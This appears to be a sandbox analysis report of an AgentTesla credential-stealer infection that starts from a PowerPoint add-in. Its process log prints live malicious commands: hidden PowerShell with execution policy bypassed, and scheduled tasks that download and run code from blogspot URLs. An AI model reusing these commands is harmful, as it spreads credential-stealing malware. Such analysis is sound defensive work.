                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:40
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou "
                                                                                                                                                                      Imagebase:0x290000
                                                                                                                                                                      File size:1849008 bytes
                                                                                                                                                                      MD5 hash:68F52CD14C61DDC941769B55AE3F2EE9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:48
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1
                                                                                                                                                                      Imagebase:0xa50000
                                                                                                                                                                      File size:430592 bytes
                                                                                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:48
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:38
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
                                                                                                                                                                      Imagebase:0xc10000
                                                                                                                                                                      File size:185856 bytes
                                                                                                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:39
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff777fc0000
                                                                                                                                                                      File size:447488 bytes
                                                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:39
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:43
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff777fc0000
                                                                                                                                                                      File size:447488 bytes
                                                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:44
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:51
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff777fc0000
                                                                                                                                                                      File size:447488 bytes
                                                                                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:.Net C# or VB.NET

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:20:52
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      Imagebase:0x7ff7f20f0000
                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:10
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Imagebase:0x1d0000
                                                                                                                                                                      File size:36864 bytes
                                                                                                                                                                      MD5 hash:AE2C1DCC77B6ED0711330B075028D7B3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:11
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Imagebase:0xb40000
                                                                                                                                                                      File size:36864 bytes
                                                                                                                                                                      MD5 hash:AE2C1DCC77B6ED0711330B075028D7B3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:13
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
                                                                                                                                                                      Imagebase:0x630000
                                                                                                                                                                      File size:36864 bytes
                                                                                                                                                                      MD5 hash:AE2C1DCC77B6ED0711330B075028D7B3
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:23
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff73f650000
                                                                                                                                                                      File size:226816 bytes
                                                                                                                                                                      MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:21:30
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;
                                                                                                                                                                      Imagebase:0x7ff73f650000
                                                                                                                                                                      File size:226816 bytes
                                                                                                                                                                      MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis


                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:17.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:5.7%
                                                                                                                                                                        Total number of Nodes:122
                                                                                                                                                                        Total number of Limit Nodes:7

                                                                                                                                                                        Graph


                                                                                                                                                                        Executed Functions

                                                                                                                                                                        APIs
                                                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0134AF87
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2874748243-0
                                                                                                                                                                        • Opcode ID: d99967a6b2e68b46d158a289c3525980ab9c1cf20f945a6aae477cf3d8299d7d
                                                                                                                                                                        • Instruction ID: c06cc43ce4e61a1e81c4af60001a942b7405173872447d130a71e8ad10a37027
                                                                                                                                                                        • Opcode Fuzzy Hash: d99967a6b2e68b46d158a289c3525980ab9c1cf20f945a6aae477cf3d8299d7d
                                                                                                                                                                        • Instruction Fuzzy Hash: 4421BF75509384AFEB238F25DC40B52BFF4EF06210F08859AE9858F1A3D234A908CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 0134B0F5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                                                        • Opcode ID: 3d270f5a7c922150ee75b0938cc0411991ae5d386e7bc4183d874c8c80067ea5
                                                                                                                                                                        • Instruction ID: 76d358bfe65cae9a89422645dfc0a0ffe07ad653b6ca4a2ec6e70be56c0cc17f
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d270f5a7c922150ee75b0938cc0411991ae5d386e7bc4183d874c8c80067ea5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3E118E724093C09FDB238F14DC45A52FFB4EF16324F0985DAE9848F163D275A918CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0134AF87
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustPrivilegesToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2874748243-0
                                                                                                                                                                        • Opcode ID: 8395a3cbebd29722b4e9bc4e381ea22c409316516ba7358c9d4dfca004b6f3a0
                                                                                                                                                                        • Instruction ID: 2f05b13c428dd78fb356f1ed0bfd9b0fa09d5609c73880afceca654f361b9c91
                                                                                                                                                                        • Opcode Fuzzy Hash: 8395a3cbebd29722b4e9bc4e381ea22c409316516ba7358c9d4dfca004b6f3a0
                                                                                                                                                                        • Instruction Fuzzy Hash: 091170755402449FEB21CF59DD84B56FBE8FF04320F08C56AED868B652D331E418CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtQuerySystemInformation.NTDLL ref: 0134B0F5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationQuerySystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3562636166-0
                                                                                                                                                                        • Opcode ID: a377e18f269dafe0d4e6c2221607d1fb88c32ecd4ef9741d2b1ed303b82618dc
                                                                                                                                                                        • Instruction ID: 74af2b7892586c901364ed8053eb87977839edacee8115b6d8ec5958c481e083
                                                                                                                                                                        • Opcode Fuzzy Hash: a377e18f269dafe0d4e6c2221607d1fb88c32ecd4ef9741d2b1ed303b82618dc
                                                                                                                                                                        • Instruction Fuzzy Hash: A6018B315002449FDB22CF49D984B25FFE4EF08325F08C59ADD894B616C375E418CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 05D41D69
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        • Opcode ID: 2d09754204117649e2b3fa51adb069f78e6e9b21a1d9b12da48eab150b3979c6
                                                                                                                                                                        • Instruction ID: 753f9d997d6efd22fe4cef0857c4e016b67b845c6e57a7cfbe7f8e4ab5e4383d
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d09754204117649e2b3fa51adb069f78e6e9b21a1d9b12da48eab150b3979c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 983106B15053806FE711CF54DD45BA6BFA8FF46320F1881ABE9849F252D334A948CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D42595
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        • Opcode ID: e13ba6c8776a9bba0ce3a02d4f98d55a4251d6e0d27241668c689e35b7dbf3b1
                                                                                                                                                                        • Instruction ID: f1c2f1bf81442455e1a19ce4190ca650b43c0bb3793d5b046738a6f202e818ab
                                                                                                                                                                        • Opcode Fuzzy Hash: e13ba6c8776a9bba0ce3a02d4f98d55a4251d6e0d27241668c689e35b7dbf3b1
                                                                                                                                                                        • Instruction Fuzzy Hash: FF419272408384AFE7228F64DC55FA6BFB8EF46310F08859BE9859B153D264A509CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 05D40EF9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                        • Opcode ID: ff51eb6e990a1d7e2a75ff50647648f9f7a6c4daa800c40976705c520dfdd96d
                                                                                                                                                                        • Instruction ID: 47832000294021f6a07822fd93104c8f414dc24e3f9db1cee96866b194309978
                                                                                                                                                                        • Opcode Fuzzy Hash: ff51eb6e990a1d7e2a75ff50647648f9f7a6c4daa800c40976705c520dfdd96d
                                                                                                                                                                        • Instruction Fuzzy Hash: 31318F71509384AFE722CB65CD45B66BFE8EF06210F0884AAED859F252D225E509CB71
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • WSASocketW.WS2_32(?,?,?,?,?), ref: 05D41406
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Socket
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 38366605-0
                                                                                                                                                                        • Opcode ID: 053827bb6ff25a9abedf278fc2e21db41c7fb6e58ec42d16d26d2c25b4ec6363
                                                                                                                                                                        • Instruction ID: 5b75d02f2b71e53b04576e3cb96b7ed5b43553eb5472cdceddc3f2732e223d72
                                                                                                                                                                        • Opcode Fuzzy Hash: 053827bb6ff25a9abedf278fc2e21db41c7fb6e58ec42d16d26d2c25b4ec6363
                                                                                                                                                                        • Instruction Fuzzy Hash: 48318D714093C0AFE723CF65DC44B56BFB9EF06210F0985DBE9859B1A3C325A918CB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 05D4278A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 74 5d4205d-5d420e7 78 5d420ec-5d420f5 74->78 79 5d420e9 74->79 80 5d420f7 78->80 81 5d420fa-5d42109 78->81 79->78 80->81 82 5d4214d-5d42152 81->82 83 5d4210b-5d42113 WSAIoctl 81->83 82->83 84 5d42119-5d4212b 83->84 86 5d42154-5d42159 84->86 87 5d4212d-5d4214a 84->87 86->87
                                                                                                                                                                        APIs
                                                                                                                                                                        • WSAIoctl.WS2_32(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D42111
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Ioctl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3041054344-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 105 134a8d9-134a965 109 134a967 105->109 110 134a96a-134a981 105->110 109->110 112 134a9c3-134a9c8 110->112 113 134a983-134a996 RegOpenKeyExW 110->113 112->113 114 134a998-134a9c0 113->114 115 134a9ca-134a9cf 113->115 115->114
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0134A989
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Open
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 120 134a9d1-134aa4f 123 134aa54-134aa5d 120->123 124 134aa51 120->124 125 134aa62-134aa68 123->125 126 134aa5f 123->126 124->123 127 134aa6d-134aa84 125->127 128 134aa6a 125->128 126->125 130 134aa86-134aa99 RegQueryValueExW 127->130 131 134aabb-134aac0 127->131 128->127 132 134aac2-134aac7 130->132 133 134aa9b-134aab8 130->133 131->130 132->133
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134AA8C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 149 5d4167e-5d416f9 152 5d416fe-5d41704 149->152 153 5d416fb 149->153 154 5d41706 152->154 155 5d41709-5d41720 152->155 153->152 154->155 157 5d41757-5d4175c 155->157 158 5d41722-5d41735 RegQueryValueExW 155->158 157->158 159 5d41737-5d41754 158->159 160 5d4175e-5d41763 158->160 160->159
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 05D41728
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 164 5d41a14-5d41abe 169 5d41ac0-5d41ad7 MapViewOfFile 164->169 170 5d41b02-5d41b07 164->170 171 5d41b09-5d41b0e 169->171 172 5d41ad9-5d41aff 169->172 170->169 171->172
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.596754706.0000000005D40000.00000040.00000001.sdmp, Offset: 05D40000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_5d40000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileView
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3314676101-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 137 134b21c-134b2a8 141 134b2f3-134b2f8 137->141 142 134b2aa-134b2ca TerminateProcess 137->142 141->142 145 134b2cc-134b2f2 142->145 146 134b2fa-134b2ff 142->146 146->145
                                                                                                                                                                        APIs
                                                                                                                                                                        • TerminateProcess.KERNELBASE(?,00000E2C,75D9E288,00000000,00000000,00000000,00000000), ref: 0134B2B0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001F.00000002.593829009.000000000134A000.00000040.00000001.sdmp, Offset: 0134A000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_31_2_134a000_aspnet_compiler.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessTerminate
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 560597551-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 176 5d41277-5d412d7 177 5d412da-5d41332 RasEnumConnectionsW 176->177 179 5d41338-5d4134e 177->179
                                                                                                                                                                        APIs
                                                                                                                                                                        • RasEnumConnectionsW.RASAPI32(?,00000E2C,?,?), ref: 05D4132A
                                                                                                                                                                        Memory Dump Source
